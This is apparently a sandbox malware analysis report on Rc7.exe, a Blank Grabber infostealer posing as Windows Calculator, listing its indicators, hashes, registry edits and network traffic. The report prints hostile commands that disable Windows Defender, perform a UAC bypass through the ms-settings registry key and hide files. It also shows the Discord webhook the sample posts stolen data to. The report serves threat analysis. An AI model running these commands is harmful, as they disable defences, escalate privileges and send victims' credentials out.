File name:

Rc7.exe

Full analysis: https://app.any.run/tasks/89025b16-23f0-4da4-a2b6-717a62a43f29
Verdict: Malicious activity
Threats:

Blank Grabber is an infostealer written in Python. It is designed to steal a wide array of data, such as browser login credentials, crypto wallets, Telegram sessions, and Discord tokens. It is an open-source malware, with its code available on GitHub and regularly receiving updates. Blank Grabber builder’s simple interface lets threat actors even with basic skills to deploy it and conduct attacks.

Analysis date: December 29, 2024, 17:03:22
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
uac
stealer
blankgrabber
python
screenshot
evasion
discord
susp-powershell
discordgrabber
generic
growtopia
ims-api
pyinstaller
upx
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 6 sections
MD5:

A6134D59D69D21DC502E509FDAD451F2

SHA1:

9258F3B7286D0F06CB39510416A1F320CD4507AF

SHA256:

8E1FEFCC91FAF100FD83EF71AECE187A9AFF4F9594EC930CCA5C6831E57DE13A

SSDEEP:

98304:+J36dFZS715R//GUPVpYSTDtIAJQ1knyuin4eJMfqqQVH68DcDo0nkPle2dxrJKz:iSotkUh44a+WzpC/l

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executing a file with an untrusted certificate

      • Rc7.exe (PID: 5720)
      • Rc7.exe (PID: 3612)
      • Rc7.exe (PID: 3060)
      • Rc7.exe (PID: 3140)
    • BlankGrabber has been detected

      • Rc7.exe (PID: 5720)
      • Rc7.exe (PID: 3060)
    • Bypass User Account Control (Modify registry)

      • reg.exe (PID: 2496)
    • Bypass User Account Control (ComputerDefaults)

      • ComputerDefaults.exe (PID: 4308)
    • Antivirus name has been found in the command line (generic signature)

      • cmd.exe (PID: 848)
    • Adds path to the Windows Defender exclusion list

      • Rc7.exe (PID: 3140)
      • cmd.exe (PID: 6076)
      • cmd.exe (PID: 5008)
    • Create files in the Startup directory

      • Rc7.exe (PID: 3140)
    • Changes antivirus protection settings for downloading files from the Internet (IOAVProtection)

      • powershell.exe (PID: 3224)
    • Changes settings for reporting to Microsoft Active Protection Service (MAPS)

      • powershell.exe (PID: 3224)
    • Changes settings for real-time protection

      • powershell.exe (PID: 3224)
    • Changes settings for sending potential threat samples to Microsoft servers

      • powershell.exe (PID: 3224)
    • Changes settings for protection against network attacks (IPS)

      • powershell.exe (PID: 3224)
    • Changes Controlled Folder Access settings

      • powershell.exe (PID: 3224)
    • Steals credentials from Web Browsers

      • Rc7.exe (PID: 3140)
    • Actions looks like stealing of personal data

      • Rc7.exe (PID: 3140)
    • Changes settings for checking scripts for malicious actions

      • powershell.exe (PID: 3224)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7156)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 6888)
    • Resets Windows Defender malware definitions to the base version

      • MpCmdRun.exe (PID: 6768)
    • DISCORDGRABBER has been detected (YARA)

      • Rc7.exe (PID: 3140)
    • GROWTOPIA has been detected (YARA)

      • Rc7.exe (PID: 3140)
    • BLANKGRABBER has been detected (SURICATA)

      • Rc7.exe (PID: 3140)
    • Starts CMD.EXE for self-deleting

      • Rc7.exe (PID: 3140)
  • SUSPICIOUS

    • Process drops legitimate windows executable

      • Rc7.exe (PID: 5720)
      • Rc7.exe (PID: 3060)
      • Rc7.exe (PID: 3140)
    • Starts a Microsoft application from unusual location

      • Rc7.exe (PID: 5720)
      • Rc7.exe (PID: 3612)
      • Rc7.exe (PID: 3060)
      • Rc7.exe (PID: 3140)
    • The process drops C-runtime libraries

      • Rc7.exe (PID: 5720)
      • Rc7.exe (PID: 3060)
    • Executable content was dropped or overwritten

      • Rc7.exe (PID: 5720)
      • Rc7.exe (PID: 3060)
      • Rc7.exe (PID: 3140)
      • csc.exe (PID: 6440)
    • Process drops python dynamic module

      • Rc7.exe (PID: 5720)
      • Rc7.exe (PID: 3060)
    • Application launched itself

      • Rc7.exe (PID: 5720)
      • Rc7.exe (PID: 3060)
    • Loads Python modules

      • Rc7.exe (PID: 3612)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 5652)
      • cmd.exe (PID: 3436)
      • cmd.exe (PID: 5640)
    • Changes default file association

      • reg.exe (PID: 2496)
    • Uses WEVTUTIL.EXE to query events from a log or log file

      • cmd.exe (PID: 4052)
      • cmd.exe (PID: 5392)
    • Found strings related to reading or modifying Windows Defender settings

      • Rc7.exe (PID: 3612)
      • Rc7.exe (PID: 3140)
    • Starts CMD.EXE for commands execution

      • Rc7.exe (PID: 3612)
      • Rc7.exe (PID: 3140)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 848)
      • cmd.exe (PID: 6076)
      • cmd.exe (PID: 5008)
      • cmd.exe (PID: 6888)
      • cmd.exe (PID: 6456)
      • cmd.exe (PID: 6684)
      • cmd.exe (PID: 5788)
      • cmd.exe (PID: 6460)
      • cmd.exe (PID: 6676)
    • Script disables Windows Defender's IPS

      • cmd.exe (PID: 848)
    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 6076)
      • cmd.exe (PID: 5008)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 1668)
    • Get information on the list of running processes

      • Rc7.exe (PID: 3140)
      • cmd.exe (PID: 6256)
      • cmd.exe (PID: 6488)
      • cmd.exe (PID: 6236)
    • Script disables Windows Defender's real-time protection

      • cmd.exe (PID: 848)
    • Uses NETSH.EXE to obtain data on the network

      • cmd.exe (PID: 6556)
    • Uses SYSTEMINFO.EXE to read the environment

      • cmd.exe (PID: 6596)
    • Uses WMIC.EXE to obtain Windows Installer data

      • cmd.exe (PID: 6432)
      • cmd.exe (PID: 5872)
    • Starts application with an unusual extension

      • cmd.exe (PID: 6524)
      • cmd.exe (PID: 4816)
      • cmd.exe (PID: 5916)
      • cmd.exe (PID: 6676)
      • cmd.exe (PID: 5892)
      • cmd.exe (PID: 6988)
    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 6888)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 6888)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 6888)
    • Accesses antivirus product name via WMI (SCRIPT)

      • WMIC.exe (PID: 6960)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 6440)
    • Captures screenshot (POWERSHELL)

      • powershell.exe (PID: 7156)
    • Possible usage of Discord/Telegram API has been detected (YARA)

      • Rc7.exe (PID: 3140)
    • Uses WMIC.EXE to obtain operating system information

      • cmd.exe (PID: 6204)
    • Accesses product unique identifier via WMI (SCRIPT)

      • WMIC.exe (PID: 4164)
    • Accesses operating system name via WMI (SCRIPT)

      • WMIC.exe (PID: 4136)
    • Uses WMIC.EXE to obtain computer system information

      • cmd.exe (PID: 3640)
    • Uses WMIC.EXE to obtain a list of video controllers

      • cmd.exe (PID: 4536)
    • The executable file from the user directory is run by the CMD process

      • rar.exe (PID: 2676)
    • Checks for external IP

      • svchost.exe (PID: 2192)
      • Rc7.exe (PID: 3140)
    • Hides command output

      • cmd.exe (PID: 6664)
    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 6664)
    • Accesses video controller name via WMI (SCRIPT)

      • WMIC.exe (PID: 7064)
  • INFO

    • Reads the computer name

      • Rc7.exe (PID: 5720)
      • Rc7.exe (PID: 3060)
      • Rc7.exe (PID: 3140)
      • MpCmdRun.exe (PID: 6768)
    • Checks supported languages

      • Rc7.exe (PID: 5720)
      • Rc7.exe (PID: 3612)
      • Rc7.exe (PID: 3060)
      • Rc7.exe (PID: 3140)
      • tree.com (PID: 7028)
      • tree.com (PID: 6548)
      • tree.com (PID: 6628)
      • tree.com (PID: 6648)
      • tree.com (PID: 6744)
      • csc.exe (PID: 6440)
      • tree.com (PID: 6568)
      • cvtres.exe (PID: 1988)
      • MpCmdRun.exe (PID: 6768)
      • rar.exe (PID: 2676)
    • The sample compiled with english language support

      • Rc7.exe (PID: 5720)
      • Rc7.exe (PID: 3060)
      • Rc7.exe (PID: 3140)
    • Create files in a temporary directory

      • Rc7.exe (PID: 5720)
      • Rc7.exe (PID: 3612)
      • Rc7.exe (PID: 3060)
      • Rc7.exe (PID: 3140)
      • cvtres.exe (PID: 1988)
      • MpCmdRun.exe (PID: 6768)
      • csc.exe (PID: 6440)
      • rar.exe (PID: 2676)
    • The process uses the downloaded file

      • cmd.exe (PID: 5320)
    • Reads security settings of Internet Explorer

      • ComputerDefaults.exe (PID: 4308)
      • WMIC.exe (PID: 6960)
      • WMIC.exe (PID: 4136)
      • WMIC.exe (PID: 5444)
      • WMIC.exe (PID: 4164)
      • WMIC.exe (PID: 7064)
    • Creates files in the program directory

      • Rc7.exe (PID: 3140)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 3092)
    • The Powershell gets current clipboard

      • powershell.exe (PID: 6936)
    • Checks the directory tree

      • tree.com (PID: 7028)
      • tree.com (PID: 6628)
      • tree.com (PID: 6548)
      • tree.com (PID: 6568)
      • tree.com (PID: 6648)
      • tree.com (PID: 6744)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 3224)
      • powershell.exe (PID: 2572)
      • powershell.exe (PID: 3260)
    • Reads the machine GUID from the registry

      • csc.exe (PID: 6440)
      • rar.exe (PID: 2676)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 2572)
      • powershell.exe (PID: 3260)
      • powershell.exe (PID: 3224)
      • powershell.exe (PID: 6744)
      • powershell.exe (PID: 6404)
    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • Rc7.exe (PID: 3140)
    • PyInstaller has been detected (YARA)

      • Rc7.exe (PID: 3140)
      • Rc7.exe (PID: 3060)
    • UPX packer has been detected

      • Rc7.exe (PID: 3140)
    • Displays MAC addresses of computer network adapters

      • getmac.exe (PID: 6260)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

ims-api

(PID) Process(3140) Rc7.exe
Discord-Webhook-Tokens (1)1320876585930330214/XV-xlA4xB_nJMSjNv2vW8mZxVcZjcB7QATRvHdg_hNk_7PKmfGwqIczpWVdH5Ama5xwN
Discord-Info-Links
1320876585930330214/XV-xlA4xB_nJMSjNv2vW8mZxVcZjcB7QATRvHdg_hNk_7PKmfGwqIczpWVdH5Ama5xwN
Get Webhook Infohttps://discord.com/api/webhooks/1320876585930330214/XV-xlA4xB_nJMSjNv2vW8mZxVcZjcB7QATRvHdg_hNk_7PKmfGwqIczpWVdH5Ama5xwN
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2024:12:23 22:29:32+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.41
CodeSize: 172032
InitializedDataSize: 94208
UninitializedDataSize: -
EntryPoint: 0xce20
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 10.0.26100.1882
ProductVersionNumber: 10.0.26100.1882
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: Microsoft Corporation
FileDescription: Windows Calculator
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
InternalName: WIN32CALC
LegalCopyright: © Microsoft Corporation. All rights reserved.
OriginalFileName: WIN32CALC.EXE
ProductName: Microsoft® Windows® Operating System
ProductVersion: 10.0.26100.1882
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
241
Monitored processes
122
Malicious processes
11
Suspicious processes
6

Behavior graph

Click at the process to see the details
start #BLANKGRABBER rc7.exe rc7.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs wevtutil.exe no specs cmd.exe no specs conhost.exe no specs computerdefaults.exe no specs computerdefaults.exe no specs computerdefaults.exe #BLANKGRABBER rc7.exe cmd.exe no specs conhost.exe no specs wevtutil.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs #BLANKGRABBER rc7.exe cmd.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs mshta.exe no specs attrib.exe no specs powershell.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs tasklist.exe no specs tasklist.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs powershell.exe no specs systeminfo.exe no specs wmic.exe no specs netsh.exe no specs tree.com no specs tasklist.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs csc.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs cvtres.exe no specs tiworker.exe no specs mpcmdrun.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs getmac.exe no specs cmd.exe no specs conhost.exe no specs rar.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs svchost.exe cmd.exe no specs conhost.exe no specs ping.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
444\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
512powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERC:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
848C:\WINDOWS\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"C:\Windows\System32\cmd.exeRc7.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
904\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1668C:\WINDOWS\system32\cmd.exe /c "attrib +h +s "C:\Users\admin\Desktop\Rc7.exe""C:\Windows\System32\cmd.exeRc7.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
1988C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES931B.tmp" "c:\Users\admin\AppData\Local\Temp\ac1pflgk\CSC33394B2B2602490E8B68924A034565F.TMP"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
14.32.31326.0
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\vcruntime140_1_clr0400.dll
2076\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2260C:\WINDOWS\system32\cmd.exe /c "C:\Users\admin\AppData\Local\Temp\_MEI30602\rar.exe a -r -hp"blank123" "C:\Users\admin\AppData\Local\Temp\etquC.zip" *"C:\Windows\System32\cmd.exeRc7.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
2496reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /fC:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
Total events
59 785
Read events
59 773
Write events
8
Delete events
4

Modification events

(PID) Process:(2496) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell\open\command
Operation:writeName:DelegateExecute
Value:
(PID) Process:(4308) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:(4308) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(4308) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(4308) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(4980) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell\open\command
Operation:delete keyName:(default)
Value:
(PID) Process:(4980) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell\open
Operation:delete keyName:(default)
Value:
(PID) Process:(4980) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell
Operation:delete keyName:(default)
Value:
(PID) Process:(4980) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings
Operation:delete keyName:(default)
Value:
(PID) Process:(3140) Rc7.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Multimedia\DrawDib
Operation:writeName: 1280x720x32(BGR 0)
Value:
31,31,31,31
Executable files
38
Suspicious files
16
Text files
54
Unknown types
0

Dropped files

PID
Process
Filename
Type
5720Rc7.exeC:\Users\admin\AppData\Local\Temp\_MEI57202\_decimal.pydexecutable
MD5:9CFB6D9624033002BC19435BAE7FF838
SHA256:41B0B60FE2AA2B63C93D3CE9AB69247D440738EDB4805F18DB3D1DAA6BB3EBFF
5720Rc7.exeC:\Users\admin\AppData\Local\Temp\_MEI57202\rar.exeexecutable
MD5:9C223575AE5B9544BC3D69AC6364F75E
SHA256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
5720Rc7.exeC:\Users\admin\AppData\Local\Temp\_MEI57202\_lzma.pydexecutable
MD5:ADEAA96A07B7B595675D9F351BB7A10C
SHA256:3E749F5FAD4088A83AE3959825DA82F91C44478B4EB74F92387FF50FF1B8647D
5720Rc7.exeC:\Users\admin\AppData\Local\Temp\_MEI57202\_bz2.pydexecutable
MD5:E1B31198135E45800ED416BD05F8362E
SHA256:43F812A27AF7E3C6876DB1005E0F4FB04DB6AF83A389E5F00B3F25A66F26EB80
5720Rc7.exeC:\Users\admin\AppData\Local\Temp\_MEI57202\_ssl.pydexecutable
MD5:309B1A7156EBD03474B44F11BA363E89
SHA256:67ED13570C5376CD4368EA1E4C762183629537F13504DB59D1D561385111FE0A
5720Rc7.exeC:\Users\admin\AppData\Local\Temp\_MEI57202\blank.aesbinary
MD5:5BC2306721AAF9ACDAE15962EDA4179C
SHA256:A3C224B1AEC6A946168268C6401F1E876E53AA84C591863717A61FBEF21A899B
5720Rc7.exeC:\Users\admin\AppData\Local\Temp\_MEI57202\_sqlite3.pydexecutable
MD5:F018B2C125AA1ECC120F80180402B90B
SHA256:67A887D3E45C8836F8466DC32B1BB8D64C438F24914F9410BC52B02003712443
5720Rc7.exeC:\Users\admin\AppData\Local\Temp\_MEI57202\python313.dllexecutable
MD5:9A3D3AE5745A79D276B05A85AEA02549
SHA256:09693BAB682495B01DE8A24C435CA5900E11D2D0F4F0807DAE278B3A94770889
5720Rc7.exeC:\Users\admin\AppData\Local\Temp\_MEI57202\base_library.zipcompressed
MD5:18C3F8BF07B4764D340DF1D612D28FAD
SHA256:6E30043DFA5FAF9C31BD8FB71778E8E0701275B620696D29AD274846676B7175
5720Rc7.exeC:\Users\admin\AppData\Local\Temp\_MEI57202\libssl-3.dllexecutable
MD5:B2E766F5CF6F9D4DCBE8537BC5BDED2F
SHA256:3CC6828E7047C6A7EFF517AA434403EA42128C8595BF44126765B38200B87CE4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
23
DNS requests
9
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6072
svchost.exe
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6072
svchost.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
204
142.250.185.227:443
https://gstatic.com/generate_204
unknown
3140
Rc7.exe
GET
200
208.95.112.1:80
http://ip-api.com/json/?fields=225545
unknown
shared
POST
404
162.159.138.232:443
https://discord.com/api/webhooks/1320876585930330214/XV-xlA4xB_nJMSjNv2vW8mZxVcZjcB7QATRvHdg_hNk_7PKmfGwqIczpWVdH5Ama5xwN
unknown
binary
45 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.255:137
whitelisted
6072
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4712
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
6072
svchost.exe
2.16.164.49:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
4712
MoUsoCoreWorker.exe
2.16.164.49:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
6072
svchost.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4712
MoUsoCoreWorker.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4712
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
whitelisted
google.com
  • 142.250.185.174
whitelisted
crl.microsoft.com
  • 2.16.164.49
  • 2.16.164.120
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted
gstatic.com
  • 142.250.181.227
whitelisted
ip-api.com
  • 208.95.112.1
shared
discord.com
  • 162.159.138.232
  • 162.159.137.232
  • 162.159.128.233
  • 162.159.136.232
  • 162.159.135.232
whitelisted
self.events.data.microsoft.com
  • 51.105.71.136
whitelisted

Threats

PID
Process
Class
Message
2192
svchost.exe
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
2192
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
2192
svchost.exe
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discord .com)
3140
Rc7.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
3140
Rc7.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
3140
Rc7.exe
A Network Trojan was detected
STEALER [ANY.RUN] BlankGrabber (SkochGrabber) Generic External IP Check
No debug info